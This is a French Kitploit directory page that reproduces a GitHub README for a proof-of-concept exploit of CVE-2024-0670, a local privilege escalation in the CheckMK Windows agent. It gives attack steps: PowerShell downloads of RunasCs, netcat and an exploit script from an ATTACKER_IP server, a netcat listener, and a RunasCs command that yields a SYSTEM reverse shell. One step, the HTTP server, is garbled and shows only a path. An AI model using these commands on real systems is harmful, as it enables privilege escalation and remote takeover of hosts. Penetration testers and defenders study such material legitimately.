Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-0670-CheckMK-Agent-Local-Privilege-Escalation-Exploit — Ce dépôt contient une démonstration d'exploit pour CVE-2024-0670, une vulnérabilité d'élévation de privilèges locaux affectant l'agent CheckMK pour Windows. La vulnérabilité permet à un utilisateur à faibles privilèges d'obtenir des privilèges SYSTEM en abusant des chemins de fichiers inscriptibles traités par le mécanisme de réparation MSI. | Kitploit
Outils/GitHubGitHub/elsevar11/cve-2024-0670-checkmk-agent-local-privilege-escalation-exploit
Escalade de PrivilègesGénération de PayloadsAnalyse des VulnérabilitésExploitationTests d'IntrusionApprentissage et ÉducationExploitation de Binaires
GitHubelsevar11/cve-2024-0670-checkmk-agent-local-privilege-escalation-exploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

Ce dépôt contient une démonstration d'exploit pour CVE-2024-0670, une vulnérabilité d'élévation de privilèges locaux affectant l'agent CheckMK pour Windows. La vulnérabilité permet à un utilisateur à faibles privilèges d'obtenir des privilèges SYSTEM en abusant des chemins de fichiers inscriptibles traités par le mécanisme de réparation MSI.

CVE-2024-0670-CheckMK-Agent-Local-Privilege-Escalation-Exploit

Voir le dépôt
31il y a 9 moisPas encore vérifié
Partager

CVE-2024-0670 – Élévation de privilèges locale de l'agent CheckMK (PoC)

Ce dépôt contient une preuve de concept simple et propre pour CVE-2024-0670, une vulnérabilité d'élévation de privilèges locale dans l'agent CheckMK Windows. Un utilisateur à faibles privilèges peut obtenir les privilèges SYSTEM en abusant des chemins de fichiers temporaires inscriptibles exécutés lors de la réparation MSI.

🔍 Résumé de la vulnérabilité

  • Vendeur : Tribe29
  • CVE : CVE-2024-0670
  • Avis : https://sec-consult.com/vulnerability-lab/advisory/local-privilege-escalation-via-writable-files-in-checkmk-agent/

Lors d'une réparation MSI, CheckMK exécute des fichiers sous :

root@kitploit:~
  C:\Windows\Temp\

Si un utilisateur normal peut y placer des fichiers avec des noms prévisibles, il peut exécuter des commandes en tant que NT AUTHORITY\SYSTEM.

Cet exploit insère plusieurs noms de fichiers de charge utile et déclenche la réparation MSI pour obtenir une exécution en tant que SYSTEM.

📂 Fichiers

root@kitploit:~
RunasCs.exe     → remplacement de runas (prise en charge du mot de passe en texte clair)
nc.exe          → Netcat (shell inverse)
exploit.ps1     → script d'exploit CVE-2024-0670
README.md       → documentation

🛠 Prérequis

  • Utilisateur Windows à faibles privilèges
  • PowerShell activé
  • Agent CheckMK Windows installé
  • Capacité à télécharger des fichiers
  • Python (pour un serveur HTTP simple)
  • Écouteur Netcat sur la machine de l'attaquant

📡 Démarrer le serveur HTTP

root@kitploit:~
  C:\Windows\Temp\

📥 Télécharger les outils sur la cible

root@kitploit:~
Invoke-WebRequest -Uri "http://ATTACKER_IP:8000/RunasCs.exe" -OutFile "C:\Windows\Temp\RunasCs.exe"
Invoke-WebRequest -Uri "http://ATTACKER_IP:8000/nc.exe" -OutFile "C:\Windows\Temp\nc.exe"
Invoke-WebRequest -Uri "http://ATTACKER_IP:8000/exploit.ps1" -OutFile "C:\Windows\Temp\exploit.ps1

🚀 Exécution de l'exploit

Démarrez un écouteur sur votre machine :

root@kitploit:~
nc -lvnp 1111
root@kitploit:~
.\RunasCs.exe username "password" "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Windows\Temp\exploit.ps1"

En cas de succès, vous recevez un shell inverse SYSTEM.

🔧 Construire RunasCs manuellement (optionnel)

root@kitploit:~
net4 :
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe -target:exe -optimize -out:RunasCs.exe RunasCs.cs 

net2 :
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe -target:exe -optimize -out:RunasCs_net2.exe RunasCs.cs

⚖️ Avertissement légal

Ce projet est destiné uniquement à des tests de pénétration éducatifs et autorisés. Ne l'utilisez pas à des fins illégales. L'auteur n'est pas responsable d'une mauvaise utilisation.

Télécharger l’outil